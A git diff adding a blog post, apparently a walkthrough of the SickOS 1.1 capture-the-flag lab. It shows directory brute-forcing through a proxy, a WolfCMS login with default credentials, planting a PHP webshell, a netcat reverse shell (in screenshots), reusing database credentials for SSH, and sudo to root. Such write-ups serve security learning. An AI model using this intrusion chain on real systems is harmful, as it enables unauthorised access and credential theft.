--- a/_posts/2016-08-12-SickOS.md
+++ b/_posts/2016-08-12-SickOS.md
@@ -103,3 +103,120 @@ First we need to configure Firefox to use the proxy. I'm sure most people are aw
 
 Examing the source doesn't give much, so lets do a directory brute force using dirb with the proxy option. 
 
+```bash
+root@kali:~/Desktop/sickos# dirb http://localhost -p 192.168.61.177:3128
+
+-----------------
+DIRB v2.22    
+By The Dark Raver
+-----------------
+
+START_TIME: Fri Aug 12 11:45:54 2016
+URL_BASE: http://localhost/
+WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
+PROXY: 192.168.61.177:3128
+
+-----------------
+
+GENERATED WORDS: 4612                                                          
+
+---- Scanning URL: http://localhost/ ----
++ http://localhost/cgi-bin/ (CODE:403|SIZE:285)                                                         
++ http://localhost/connect (CODE:200|SIZE:109)                                                          
++ http://localhost/index (CODE:200|SIZE:21)                                                             
++ http://localhost/index.php (CODE:200|SIZE:21)                                                         
++ http://localhost/robots (CODE:200|SIZE:45)                                                            
++ http://localhost/robots.txt (CODE:200|SIZE:45)                                                        
++ http://localhost/server-status (CODE:200|SIZE:3906)                                                   
+                                                                                                        
+-----------------
+END_TIME: Fri Aug 12 11:45:58 2016
+DOWNLOADED: 4612 - FOUND: 7
+root@kali:~/Desktop/sickos# 
+
+```
+
+Looking at robots.txt we see that the /wolfcms path is disallowed. Lets examine further. 
+
+![wolfcms.png](/images/wolfcms.png)
+
+Awesome we have more to work with. Given the nature of this engagement and a bit of a gut feeling, there is most likely a public exploit for this CMS. Sure enough, there [is](https://www.exploit-db.com/exploits/38000/) :) Basically its a arbitrary file upload vulnerability that allows you to upload any php file, no restrictions. 
+
+To get to the vulnerable file upload page we need to get admin access, the site was still configured with the default creds of admin:admin so all is well. 
+
+![wolfcms_admin.png](/images/wolfcms_admin.png)
+
+Apart from the capability to upload a file, we can also craft our own PHP file inside of the application itself.
+
+![https://cdn.meme.am/instances/500x/56158060.jpg](https://cdn.meme.am/instances/500x/56158060.jpg)
+
+Just to switch things up I figured I'd use the b347k shell instead of the standard php webshells you find on the internet (although this one is from the internet as well)....stealth is not the name of the game here.
+
+![wolfcms_backdoor_creation.png](/images/wolfcms_backdoor_creation.png)
+
+Now we have our backdoor at /hello.php, giving us access as user www-data. While this is nice and all, I need a full shell to start escalating privileges. Lets set up nc to listen...
+
+![nc_rs_catch.png](/images/nc_rs_catch.png)
+
+and reverse shell out...
+
+![b374_reverse_shell_php.png](/images/b374_reverse_shell_php.png)
+
+While I'm performing my privilege escalation tricks (fantatic [guide](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) by @g0tm1lk), I forgot that shells provided by nc suck cause you can't make a typo. So I need a better shell, hey I can be picky in this case :) Anyway, wolfcms has a mysql backend and investigating /var/www/wolfcms/config.php gives the credentials to the database. 
+
+![config_php.png](/images/config_php.png)
+
+Investigating /etc/passwd indicates the only "normal" user is 'sickos'. I'm willing to bet that the same credentials for mysql are the also for this user. Lets see if we can ssh in. 
+
+```bash
+root@kali:~/Desktop/sickos# ssh -l sickos 192.168.61.177
+sickos@192.168.61.177's password: 
+Welcome to Ubuntu 12.04.4 LTS (GNU/Linux 3.11.0-15-generic i686)
+
+ * Documentation:  https://help.ubuntu.com/
+
+  System information as of Fri Aug 12 22:53:00 IST 2016
+
+  System load:  0.0               Processes:           121
+  Usage of /:   4.3% of 28.42GB   Users logged in:     0
+  Memory usage: 12%               IP address for eth0: 192.168.61.177
+  Swap usage:   0%
+
+  Graph this data and manage this system at:
+    https://landscape.canonical.com/
+
+124 packages can be updated.
+92 updates are security updates.
+
+New release '14.04.3 LTS' available.
+Run 'do-release-upgrade' to upgrade to it.
+
+Last login: Fri Aug 12 22:46:51 2016 from 192.168.61.176
+sickos@SickOs:~$
+```
+
+So what's cool here is the sickos user is a member of the sudoers group. It's one of the first things I try and it has worked on multiple engagements. This saves alot of time as you can drop into root as long as you known the current user's credentials. Let's grab the flag and we are out of here. 
+
+```bash
+sickos@SickOs:~$ sudo su -
+[sudo] password for sickos: 
+Sorry, try again.
+[sudo] password for sickos: 
+root@SickOs:~# ls
+a0216ea4d51874464078c618298b1367.txt
+root@SickOs:~# cat a0216ea4d51874464078c618298b1367.txt 
+If you are viewing this!!
+
+ROOT!
+
+You have Succesfully completed SickOS1.1.
+Thanks for Trying
+
+
+root@SickOs:~# 
+```
+
+When I get some time I think I'll move onto SickOS 1.2. I'll be publish more posts soon, with content other than vulnhub walkthrougt!
+
+Thanks for reading and happy hacking!
+
